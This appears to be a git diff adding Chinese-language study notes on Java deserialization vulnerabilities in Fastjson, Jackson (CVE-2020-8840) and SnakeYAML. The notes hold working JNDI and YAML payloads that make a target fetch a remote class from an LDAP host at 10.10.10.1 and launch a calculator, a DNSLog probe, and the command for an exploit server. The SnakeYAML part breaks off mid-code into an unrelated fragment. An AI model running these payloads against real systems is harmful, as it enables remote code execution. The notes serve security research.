a/mechanism/serialization/fastjson/note/img/image-20220110014358909.png b/mechanism/serialization/fastjson/note/img/image-20220110014358909.png new file mode 100644 index 00000000..7b628c1a Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110014358909.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110014625513.png b/mechanism/serialization/fastjson/note/img/image-20220110014625513.png new file mode 100644 index 00000000..9320b884 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110014625513.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110015047912.png b/mechanism/serialization/fastjson/note/img/image-20220110015047912.png new file mode 100644 index 00000000..d72e43a4 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110015047912.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110015312401.png b/mechanism/serialization/fastjson/note/img/image-20220110015312401.png new file mode 100644 index 00000000..37d20082 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110015312401.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110015633886.png b/mechanism/serialization/fastjson/note/img/image-20220110015633886.png new file mode 100644 index 00000000..74038d25 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110015633886.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110020122733.png b/mechanism/serialization/fastjson/note/img/image-20220110020122733.png new file mode 100644 index 00000000..207fc714 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110020122733.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110020346569.png b/mechanism/serialization/fastjson/note/img/image-20220110020346569.png new file mode 100644 index 00000000..0000890a Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110020346569.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110020750595.png b/mechanism/serialization/fastjson/note/img/image-20220110020750595.png new file mode 100644 index 00000000..39f07341 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110020750595.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110021423356.png b/mechanism/serialization/fastjson/note/img/image-20220110021423356.png new file mode 100644 index 00000000..b614b8c1 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110021423356.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110021553549.png b/mechanism/serialization/fastjson/note/img/image-20220110021553549.png new file mode 100644 index 00000000..a69f8cbc Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110021553549.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110022127739.png b/mechanism/serialization/fastjson/note/img/image-20220110022127739.png new file mode 100644 index 00000000..cad67090 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110022127739.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110022835890.png b/mechanism/serialization/fastjson/note/img/image-20220110022835890.png new file mode 100644 index 00000000..7ca7b43d Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110022835890.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110023158446.png b/mechanism/serialization/fastjson/note/img/image-20220110023158446.png new file mode 100644 index 00000000..f1304d9f Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110023158446.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110023509406.png b/mechanism/serialization/fastjson/note/img/image-20220110023509406.png new file mode 100644 index 00000000..d065b338 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110023509406.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110023906262.png b/mechanism/serialization/fastjson/note/img/image-20220110023906262.png new file mode 100644 index 00000000..5825e250 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110023906262.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110024153294.png b/mechanism/serialization/fastjson/note/img/image-20220110024153294.png new file mode 100644 index 00000000..22a7209a Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110024153294.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110025245969.png b/mechanism/serialization/fastjson/note/img/image-20220110025245969.png new file mode 100644 index 00000000..885c03d6 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110025245969.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110030044227.png b/mechanism/serialization/fastjson/note/img/image-20220110030044227.png new file mode 100644 index 00000000..82052af7 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110030044227.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110031401317.png b/mechanism/serialization/fastjson/note/img/image-20220110031401317.png new file mode 100644 index 00000000..40a48087 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110031401317.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110031605273.png b/mechanism/serialization/fastjson/note/img/image-20220110031605273.png new file mode 100644 index 00000000..cdbbf70f Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110031605273.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110032229069.png b/mechanism/serialization/fastjson/note/img/image-20220110032229069.png new file mode 100644 index 00000000..a5935ff8 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110032229069.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110033000831.png b/mechanism/serialization/fastjson/note/img/image-20220110033000831.png new file mode 100644 index 00000000..d90c7a8b Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110033000831.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110033704985.png b/mechanism/serialization/fastjson/note/img/image-20220110033704985.png new file mode 100644 index 00000000..d90c7a8b Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110033704985.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110033852412.png b/mechanism/serialization/fastjson/note/img/image-20220110033852412.png new file mode 100644 index 00000000..c3e82000 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110033852412.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110033930830.png b/mechanism/serialization/fastjson/note/img/image-20220110033930830.png new file mode 100644 index 00000000..aa9605fa Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110033930830.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110034219641.png b/mechanism/serialization/fastjson/note/img/image-20220110034219641.png new file mode 100644 index 00000000..120e9b6f Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110034219641.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110034337153.png b/mechanism/serialization/fastjson/note/img/image-20220110034337153.png new file mode 100644 index 00000000..cf3e79f4 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110034337153.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110034754508.png b/mechanism/serialization/fastjson/note/img/image-20220110034754508.png new file mode 100644 index 00000000..930e082e Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110034754508.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110034944896.png b/mechanism/serialization/fastjson/note/img/image-20220110034944896.png new file mode 100644 index 00000000..4b48c78b Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110034944896.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110035255396.png b/mechanism/serialization/fastjson/note/img/image-20220110035255396.png new file mode 100644 index 00000000..8d0e48c9 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110035255396.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110040523386.png b/mechanism/serialization/fastjson/note/img/image-20220110040523386.png new file mode 100644 index 00000000..27a03d65 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110040523386.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110042918567.png b/mechanism/serialization/fastjson/note/img/image-20220110042918567.png new file mode 100644 index 00000000..4d405007 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110042918567.png differ diff --git a/mechanism/serialization/fastjson/note/img/image-20220110113731767.png b/mechanism/serialization/fastjson/note/img/image-20220110113731767.png new file mode 100644 index 00000000..701052f3 Binary files /dev/null and b/mechanism/serialization/fastjson/note/img/image-20220110113731767.png differ diff --git "a/mechanism/serialization/fastjson/note/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/mechanism/serialization/fastjson/note/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..6a625379 --- /dev/null +++ "b/mechanism/serialization/fastjson/note/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,200 @@ +漏洞探测 +--- + +### 探测 Fastjson +```text +无害判断后端的 json 处理组件是否为 fastjson +``` +#### DNSLog + +- [通过dnslog探测fastjson的几种方法](https://gv7.me/articles/2020/several-ways-to-detect-fastjson-through-dnslog/) +- [发现最新版本1.2.67依然可以通过dnslog判断后端是否使用fastjson](https://github.com/alibaba/fastjson/issues/3077) `讨论区很精彩` + +### 版本识别 + +#### 触发异常回显 +- 适用于会返回异常的场景,出不出网都可 + +特殊业务场景,抛出异常信息 +- 为什么说`特殊`,因为很多场景不一定会回显 + +```java + @ResponseBody + public String parseObjectHandler(@RequestBody String dataStr) { + try { + JSONObject data = JSON.parseObject(dataStr); + return dataStr; + } catch (Exception e) { + return "error: " + e.getMessage(); + } + } +``` + +- 已测试 + - v1.2.23 + - v1.2.47(default) + - v1.2.68(default) + - v1.2.76(default) + - v1.2.80(default)-> v1.2.76(代码就是这样写的 !) + - v1.2.83 + +```text +// https://b1ue.cn/archives/402.html +{"@type":"java.lang.AutoCloseable" +``` +![](img/dcf784b91c1549b3bb3a38dee5f28511.png) + +![](img/93afd2976fce487d85794a41f6700d65.png) + +![](img/eaaa5eee918f49238b531632a1b3eb76.png) + + +v1.2.80 -> v1.2.76 ??? `果然眼见也不一定为实` + +- com.alibaba.fastjson.parser.deserializer.JavaBeanDeserializer + +![](img/41a2f918a49c41b7ac62521bafa778cb.png) + +![](img/32e2b52cedb344d5be39ed880c30e134.png) + +#### DNSLog + 黑名单 + +- 适用于出网无回显的场景 + +思路: +根据每个版本所内置的黑名单不同,去加载相关的类来判断 +- 加载成功 -> 不报错 +- 加载失败 -> 报错 + + + +参考: +https://github.com/LeadroyaL/fastjson-blacklist + +#### 延时 + +##### JNDI -> SSRF + +##### DoS + + +### 判断 autoType 是否开启 + +判断autoType是否开启,选择利用链。 + +``` +[{"@type":"java.net.CookiePolicy"},{"@type":"java.net.Inet4Address","val":"ydk3cz.dnslog.cn"}] +``` + +- DNSLog有解析记录 -> autoType 开启 / fastjson < v1.2.24 +- DNSLog没有解析记录 -> autoType 未开启 + + +### 探测 Gadget +思路: +通过加载相关Gadget的类是否成功来判断该利用链是否存在。 + + + + +漏洞利用 +--- + +### HTTP + +#### c3p0 - URLClassLoader + +- https://tttang.com/archive/1411/#toc_urlclassloader + +### JNDI + +- 利用条件限制 + - [Bypass](https://paper.seebug.org/942/#4-jdk-8u191) + +``` +RMI利用的JDK版本≤ JDK 6u132、7u122、8u113 +LADP利用JDK版本≤ 6u211 、7u201、8u191 +``` + +#### rt - JdbcRowSetImpl + + +#### c3p0 + +- https://tttang.com/archive/1411/#toc_jndi + +#### ibatis / mybatis - JndiDataSourceFactory + +- org.apache.ibatis.datasource.jndi.JndiDataSourceFactory.setProperties + - initCtx.lookup("可控") + + +```text +public void setProperties(Properties properties) { + try { + Properties env = getEnvProperties(properties); + InitialContext initCtx; + if (env == null) { + initCtx = new InitialContext(); + } else { + initCtx = new InitialContext(env); + } + + if (properties.containsKey("initial_context") && properties.containsKey("data_source")) { + Context ctx = (Context)initCtx.lookup(properties.getProperty("initial_context")); + this.dataSource = (DataSource)ctx.lookup(properties.getProperty("data_source")); + } else if (properties.containsKey("data_source")) { + this.dataSource = (DataSource)initCtx.lookup(properties.getProperty("data_source")); + } +``` + +#### xbean-reflect - JndiConverter + + + +### 不出网 + +- [FastJson RCE不出网利用研究](https://mp.weixin.qq.com/s/nKPsoNkHtNdOj-_v53Bc9w) + +#### tomcat-dbcp/commons-dbcp - BasicDataSource + BCEL + +- https://github.com/depycode/fastjson-local-echo + + +#### c3p0 + +- https://github.com/depycode/fastjson-c3p0 + +- [JAVA反序列化之C3P0不出网利用](http://www.yulegeyu.com/2021/10/10/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8BC3P0%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) + +#### rt - TemplatesImpl - 鸡肋 + +利用条件: + +Feature.SupportNonPublicField 需要开启,因为_bytecodes 和 _outputProperties 两个关键属性是私有的 + +#### commons-io 文件操作 + +- [fastjson 读文件 gadget 的利用场景扩展](https://b1ue.cn/archives/506.html) +- [Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析](https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg) + + +#### rt - MarshalOutputStream 文件操作 + +- [fastjson v1.2.68 RCE利用链复现](https://mp.weixin.qq.com/s?__biz=MzI4OTQ5Njc2Mw==&mid=2247484334&idx=1&sn=825221db6e7d0ba3b7b4713ac3bf68fa&chksm=ec2f087adb58816c3b4aab28d2d53f2a22617233bd91ad8e4887a1724dc1747ab9ffc03c5c93&scene=126&&sessionid=1663752244#rd) + + +#### ibatis/mybatis - UnpooledDataSource + BCEL + + +代码审计 +--- + +``` +.parseObject() +.parse() +``` + + + + diff --git a/mechanism/serialization/jackson/note/README.md b/mechanism/serialization/jackson/note/README.md new file mode 100644 index 00000000..a2d8e0eb --- /dev/null +++ b/mechanism/serialization/jackson/note/README.md @@ -0,0 +1,327 @@ + + +# 相关漏洞 + +## RCE + +### CVE-2020-8840 + +#### 漏洞描述 + +- JNDI注入 -> RCE + +- 影响范围(存疑) + +```shell +# https://nvd.nist.gov/vuln/detail/CVE-2020-8840 +v2.0.0 through v2.9.10.2 +# 本地测试版本 +v2.10.1 +``` + +- 利用条件 + - 开启enableDefaultTyping() + - 存在第三方依赖:xbean-reflect + +#### 漏洞复现 + +##### 环境搭建 + +pom.xml + +```xml + + com.fasterxml.jackson.core + jackson-databind + 2.10.1 + + + + com.fasterxml.jackson.core + jackson-databind + 2.10.1 + + + + com.fasterxml.jackson.core + jackson-annotations + 2.10.1 + + + + org.apache.xbean + xbean-reflect + 4.15 + +``` + +PayloadRunner.java + +```java +import com.fasterxml.jackson.core.JsonProcessingException; +import com.fasterxml.jackson.databind.ObjectMapper; + + +public class PayloadRunner { + public static void main(String args[]) throws JsonProcessingException { + ObjectMapper mapper = new ObjectMapper(); + mapper.enableDefaultTyping(); + String evilJson = ""; + mapper.readValue(evilJson, Object.class); + } +} +``` + +##### 漏洞验证 + +LDAP服务端 + +```shell +java -jar .\JNDIExploit-1.4-SNAPSHOT-modified.jar -i 10.10.10.1 +``` + +![image-20220124164807399](img/image-20220124164807399.png) + +Payload-弹计算器 + +```java +// calc +[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://10.10.10.1:1389/62617369632F436F6D6D616E642F63616C63\"}] +``` + +测试效果 + +![image-20220124165036128](img/image-20220124165036128.png) + + + +#### 漏洞分析 + +diff 如下 + +![image-20220124163901495](img/image-20220124163901495.png) + +定位到JndiConverter类,并下断点 + +- org.apache.xbean.propertyeditor.JndiConverter#toObjectImpl + +```java +protected Object toObjectImpl(String text) { + try { + InitialContext context = new InitialContext(); + return (Context)context.lookup(text); + } catch (NamingException var3) { + throw new PropertyEditorException(var3); + } +} +``` + +调用栈 + +```java +forName:334, Class (java.lang) +loadClass:72, VersionHelper12 (com.sun.naming.internal) +loadClass:87, VersionHelper12 (com.sun.naming.internal) +getObjectFactoryFromReference:158, NamingManager (javax.naming.spi) +getObjectInstance:189, DirectoryManager (javax.naming.spi) +c_lookup:1085, LdapCtx (com.sun.jndi.ldap) +p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx) +lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx) +lookup:205, GenericURLContext (com.sun.jndi.toolkit.url) +lookup:94, ldapURLContext (com.sun.jndi.url.ldap) +lookup:417, InitialContext (javax.naming) +toObjectImpl:35, JndiConverter (org.apache.xbean.propertyeditor) +toObject:86, AbstractConverter (org.apache.xbean.propertyeditor) +setAsText:59, AbstractConverter (org.apache.xbean.propertyeditor) +invoke0:-1, NativeMethodAccessorImpl (sun.reflect) +invoke:62, NativeMethodAccessorImpl (sun.reflect) +invoke:43, DelegatingMethodAccessorImpl (sun.reflect) +invoke:498, Method (java.lang.reflect) +deserializeAndSet:141, MethodProperty (com.fasterxml.jackson.databind.deser.impl) +vanillaDeserialize:288, BeanDeserializer (com.fasterxml.jackson.databind.deser) +deserialize:151, BeanDeserializer (com.fasterxml.jackson.databind.deser) +_deserialize:120, AsArrayTypeDeserializer (com.fasterxml.jackson.databind.jsontype.impl) +deserializeTypedFromAny:71, AsArrayTypeDeserializer (com.fasterxml.jackson.databind.jsontype.impl) +deserializeWithType:712, UntypedObjectDeserializer$Vanilla (com.fasterxml.jackson.databind.deser.std) +deserialize:68, TypeWrappedDeserializer (com.fasterxml.jackson.databind.deser.impl) +_readMapAndClose:4202, ObjectMapper (com.fasterxml.jackson.databind) +readValue:3205, ObjectMapper (com.fasterxml.jackson.databind) +readValue:3173, ObjectMapper (com.fasterxml.jackson.databind) +main:12, PayloadRunner (Deserialization.Jackson) +``` + +可以将调用栈分为两部分 + +- 反序列化:反射调用setter方法 +- JNDI注入:远程动态加载恶意类(非重点) + +##### 基于readValue()的反序列化 + +根据调用栈定位到 + +- `com.fasterxml.jackson.databind.deser.BeanDeserializer#deserialize()` + +```java +public Object deserialize(JsonParser p, DeserializationContext ctxt) throws IOException { + if (p.isExpectedStartObjectToken()) { + if (this._vanillaProcessing) { + return this.vanillaDeserialize(p, ctxt, p.nextToken()); + } else { + p.nextToken(); + return this._objectIdReader != null ? this.deserializeWithObjectId(p, ctxt) : this.deserializeFromObject(p, ctxt); + } + } else { + return this._deserializeOther(p, ctxt, p.getCurrentToken()); + } +} +``` + +当前运行时 this._vanillaProcessing 为true + +![image-20220124171929408](img/image-20220124171929408.png) + +跟进 this.vanillaDeserialize() 方法 + +- com.fasterxml.jackson.databind.deser.BeanDeserializer#vanillaDeserialize + +```java +private final Object vanillaDeserialize(JsonParser p, DeserializationContext ctxt, JsonToken t) throws IOException { + Object bean = this._valueInstantiator.createUsingDefault(ctxt); + p.setCurrentValue(bean); + if (p.hasTokenId(5)) { + String propName = p.getCurrentName(); + do { + p.nextToken(); + SettableBeanProperty prop = this._beanProperties.find(propName); + if (prop != null) { + try { + prop.deserializeAndSet(p, ctxt, bean); + } catch (Exception var8) { + this.wrapAndThrow(var8, bean, propName, ctxt); + } + } else { + this.handleUnknownVanilla(p, ctxt, bean, propName); + } + } while((propName = p.nextFieldName()) != null); + } + return bean; +} +``` + +调用 this._valueInstantiator.createUsingDefault() 方法 + +- `com.fasterxml.jackson.databind.deser.std.StdValueInstantiator#createUsingDefault` + - 反射调用其默认构造方法 + +```java +public Object createUsingDefault(DeserializationContext ctxt) throws IOException { + if (this._defaultCreator == null) { + return super.createUsingDefault(ctxt); + } else { + try { + return this._defaultCreator.call(); + } catch (Exception var3) { + return ctxt.handleInstantiationProblem(this._valueClass, (Object)null, this.rewrapCtorProblem(ctxt, var3)); + } + } +} +``` + +回到上一层调用栈,调用到 prop.deserializeAndSet() 方法,跟进 + +- `com.fasterxml.jackson.databind.deser.impl.MethodProperty#deserializeAndSet` + - 反射调用setter方法 + +```java +public void deserializeAndSet(JsonParser p, DeserializationContext ctxt, Object instance) throws IOException { + Object value; + if (p.hasToken(JsonToken.VALUE_NULL)) { + if (this._skipNulls) { + return; + } + value = this._nullProvider.getNullValue(ctxt); + } else if (this._valueTypeDeserializer == null) { + value = this._valueDeserializer.deserialize(p, ctxt); + if (value == null) { + if (this._skipNulls) { + return; + } + value = this._nullProvider.getNullValue(ctxt); + } + } else { + value = this._valueDeserializer.deserializeWithType(p, ctxt, this._valueTypeDeserializer); + } + try { + this._setter.invoke(instance, value); + } catch (Exception var6) { + this._throwAsIOE(p, var6, value); + } +} +``` + +![image-20220124173333679](img/image-20220124173333679.png) + +跟进 + +- org.apache.xbean.propertyeditor.AbstractConverter#setAsText + +```java +public final void setAsText(String text) { + Object value = this.toObject(this.trim ? text.trim() : text); + super.setValue(value); +} +``` + +调用 this.toObject() 方法 + +- `org.apache.xbean.propertyeditor.AbstractConverter#toObject` + +```java +public final Object toObject(String text) { + if (text == null) { + return null; + } else { + Object value = this.toObjectImpl(this.trim ? text.trim() : text); + return value; + } +} +``` + +调用 this.toObjectImpl() 方法,触发 lookup() 方法,从而达到JNDI注入的效果。 + +- `org.apache.xbean.propertyeditor.JndiConverter#toObjectImpl` + +```java +protected Object toObjectImpl(String text) { + try { + InitialContext context = new InitialContext(); + return (Context)context.lookup(text); + } catch (NamingException var3) { + throw new PropertyEditorException(var3); + } +} +``` + +##### JNDI 注入 + +该部分调用栈 + +```java +forName:334, Class (java.lang) +loadClass:72, VersionHelper12 (com.sun.naming.internal) +loadClass:87, VersionHelper12 (com.sun.naming.internal) +getObjectFactoryFromReference:158, NamingManager (javax.naming.spi) +getObjectInstance:189, DirectoryManager (javax.naming.spi) +c_lookup:1085, LdapCtx (com.sun.jndi.ldap) +p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx) +lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx) +lookup:205, GenericURLContext (com.sun.jndi.toolkit.url) +lookup:94, ldapURLContext (com.sun.jndi.url.ldap) +lookup:417, InitialContext (javax.naming) +``` + +代码执行原理 + +- 远程加载恶意类并实例化 + + diff --git a/mechanism/serialization/jackson/note/img/image-20220124163901495.png b/mechanism/serialization/jackson/note/img/image-20220124163901495.png new file mode 100644 index 00000000..24f852ba Binary files /dev/null and b/mechanism/serialization/jackson/note/img/image-20220124163901495.png differ diff --git a/mechanism/serialization/jackson/note/img/image-20220124164807399.png b/mechanism/serialization/jackson/note/img/image-20220124164807399.png new file mode 100644 index 00000000..c9ae1b26 Binary files /dev/null and b/mechanism/serialization/jackson/note/img/image-20220124164807399.png differ diff --git a/mechanism/serialization/jackson/note/img/image-20220124165036128.png b/mechanism/serialization/jackson/note/img/image-20220124165036128.png new file mode 100644 index 00000000..8fd6a3f4 Binary files /dev/null and b/mechanism/serialization/jackson/note/img/image-20220124165036128.png differ diff --git a/mechanism/serialization/jackson/note/img/image-20220124171929408.png b/mechanism/serialization/jackson/note/img/image-20220124171929408.png new file mode 100644 index 00000000..4d88515b Binary files /dev/null and b/mechanism/serialization/jackson/note/img/image-20220124171929408.png differ diff --git a/mechanism/serialization/jackson/note/img/image-20220124173333679.png b/mechanism/serialization/jackson/note/img/image-20220124173333679.png new file mode 100644 index 00000000..6edb83a0 Binary files /dev/null and b/mechanism/serialization/jackson/note/img/image-20220124173333679.png differ diff --git a/mechanism/serialization/serialVersionUID.md b/mechanism/serialization/serialVersionUID.md new file mode 100644 index 00000000..a649660a --- /dev/null +++ b/mechanism/serialization/serialVersionUID.md @@ -0,0 +1,34 @@ + +#### 0x1 引子 +SerialVesionUID不一致导致反序列化漏洞利用失败也算是实战中比较常见的问题了,面试也会经常提及。 + + +#### 0x2 代码分析 +反序列化的调用栈 +``` +initNonProxy:595, ObjectStreamClass (java.io) +readNonProxyDesc:1829, ObjectInputStream (java.io) +readClassDesc:1713, ObjectInputStream (java.io) +readOrdinaryObject:1986, ObjectInputStream (java.io) +readObject0:1535, ObjectInputStream (java.io) +readObject:422, ObjectInputStream (java.io) +main:18, SerializableDemo2 (serialVersionUID) +``` + +- java.io.ObjectStreamClass#initNonProxy + +![image](https://user-images.githubusercontent.com/55024146/155457995-8eb346c3-e88d-49cc-b7f0-45c9f2a6710b.png) + +对serialVersionUID做了比较,如果发现不相等,则直接抛出异常。 + +- java.io.ObjectStreamClass#getSerialVersionUID + +![image](https://user-images.githubusercontent.com/55024146/155458101-55c08f41-5312-4768-88f2-9df636ecf0b2.png) + +在没有定义serialVersionUID的时候,会调用computeDefaultSUID 方法,生成一个默认的serialVersionUID。 + + + +#### 0x3 解决方案 + +- [使用自定义ClassLoader解决反序列化serialVesionUID不一致问题](https://gv7.me/articles/2020/deserialization-of-serialvesionuid-conflicts-using-a-custom-classloader/) diff --git a/mechanism/serialization/snakeyaml/note/README.md b/mechanism/serialization/snakeyaml/note/README.md new file mode 100644 index 00000000..48696021 --- /dev/null +++ b/mechanism/serialization/snakeyaml/note/README.md @@ -0,0 +1,556 @@ +# 漏洞分析 + +## 反序列化漏洞 + +### 漏洞描述 + +当SnakeYaml.load()方法的参数外部可控时,攻击者传入一个恶意的yaml格式序列化的内容,服务端进行反序列化时加载恶意类触发恶意代码,导致远程代码执行。 + +### 漏洞复现 + +#### 环境搭建 + +pom.xml + +```xml + + + org.yaml + snakeyaml + 1.30 + +``` + +PayloadRunner.java + +```java +import org.yaml.snakeyaml.Yaml; + +public class PayloadRunner { + public static void main(String[] args){ + String evilJar = "xxx"; + Yaml yaml = new Yaml(); + yaml.load(evilJar); + } +} +``` + +#### 漏洞验证 + +##### RCE + +###### 基于 ScriptEngineManager + +利用条件 + +- 不用出网 + +payload + +- https://github.com/artsploit/yaml-payload + +![image-20220125143536995](img/image-20220125143536995.png) + +打包成jar包 + +``` +javac src/artsploit/AwesomeScriptEngineFactory.java +jar -cvf yaml-payload.jar -C src/ . +``` + +![image-20220125143635368](img/image-20220125143635368.png) + +payload-弹计算器 + +```java +String evilJar = "!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"file:///payload.jar\"]]]]"; +``` + +测试效果 + +![image-20220125143736373](img/image-20220125143736373.png) + +##### JNDI + +###### 基于 JdbcRowSetImpl + +利用条件 + +- 需出网,限制同JNDI + +LDAP服务 + +- JNDIExploit + +![image-20220125144600810](img/image-20220125144600810.png) + +payload-弹计算器 + +```java +String poc = "!!com.sun.rowset.JdbcRowSetImpl\n dataSourceName: \"ldap://10.10.10.1:1389/62617369632F436F6D6D616E642F63616C63\"\n autoCommit: true"; +``` + +测试效果 + + ![image-20220125144652166](img/image-20220125144652166.png) + +###### 基于 xbean-reflect + +这是学习[FasterXML jackson-databind](https://github.com/pen4uin/JavaSec/tree/main/jackson-databind)时用到的一条链,照猫画虎,构造payload + +弹计算器 + +```java +String evilText = "!!org.apache.xbean.propertyeditor.JndiConverter\n asText: \"ldap://10.10.10.1:1389/62617369632F436F6D6D616E642F63616C63\""; +``` + +LDAP服务端 + +``` +java -jar .\JNDIExploit-1.4-SNAPSHOT-modified.jar -i 10.10.10.1 +``` + + ![image-20220124164807399](img/image-20220124164807399.png) + +测试效果 + + ![image-20220125145833353](img/image-20220125145833353.png) + +###### 基于 more gadgets + +经过以上测试的两条链 + +- JdbcRowSetImplfastjson、对应Fastjson +- xbean-reflect、对应Jackson + +推导出SnakeYaml的反序列化可以使用Fastjson 和 Jackson 的利用链,从而得出SnakeYaml的反序列化漏洞的原理【先给出结论再分析】 + +``` +反序列化的过程中调用了setter方法 +``` + + + +### 漏洞分析 + +#### RCE + +##### 基于 ScriptEngineManager + +调试RCE漏洞犹豫在哪下断点的情况时,建议直接下在create()方法处即可,简单直接 + +- java.lang.ProcessImpl#create + +获取调用栈 + +```java +create:-1, ProcessImpl (java.lang) +:386, ProcessImpl (java.lang) +start:137, ProcessImpl (java.lang) +start:1029, ProcessBuilder (java.lang) +exec:620, Runtime (java.lang) +exec:450, Runtime (java.lang) +exec:347, Runtime (java.lang) +:12, AwesomeScriptEngineFactory (artsploit) +newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect) +newInstance:62, NativeConstructorAccessorImpl (sun.reflect) +newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect) +newInstance:423, Constructor (java.lang.reflect) +newInstance:442, Class (java.lang) +nextService:380, ServiceLoader$LazyIterator (java.util) +next:404, ServiceLoader$LazyIterator (java.util) +next:480, ServiceLoader1ドル (java.util) +initEngines:122, ScriptEngineManager (javax.script) +init:84, ScriptEngineManager (javax.script) +:75, ScriptEngineManager (javax.script) +newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect) +newInstance:62, NativeConstructorAccessorImpl (sun.reflect) +newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect) +newInstance:423, Constructor (java.lang.reflect) +construct:548, Constructor$ConstructSequence (org.yaml.snakeyaml.constructor) +construct:309, Constructor$ConstructYamlObject (org.yaml.snakeyaml.constructor) +constructObjectNoCheck:216, BaseConstructor (org.yaml.snakeyaml.constructor) +constructObject:205, BaseConstructor (org.yaml.snakeyaml.constructor) +constructDocument:164, BaseConstructor (org.yaml.snakeyaml.constructor) +getSingleData:148, BaseConstructor (org.yaml.snakeyaml.constructor) +loadFromReader:525, Yaml (org.yaml.snakeyaml) +load:438, Yaml (org.yaml.snakeyaml) +main:11, PayloadRunner (Deserialization.SnakeYAML) +``` + +入口 + +- org.yaml.snakeyaml.Yaml#load(java.lang.String) + +经过以下调用 + + ![image-20220125154705633](img/image-20220125154705633.png) + +执行到 + +- javax.script.ScriptEngineManager#init + +```java +private void init(final ClassLoader loader) { + globalScope = new SimpleBindings(); + engineSpis = new HashSet +-----------------------------37391825482350680435279262019-- +``` + + + + + +![1625380728348](img/1625380728348.png) + diff --git a/other/inxedu/img/1625345482403.png b/other/inxedu/img/1625345482403.png new file mode 100644 index 00000000..a971c96a Binary files /dev/null and b/other/inxedu/img/1625345482403.png differ diff --git a/other/inxedu/img/1625380728348.png b/other/inxedu/img/1625380728348.png new file mode 100644 index 00000000..6740557d Binary files /dev/null and b/other/inxedu/img/1625380728348.png differ diff --git 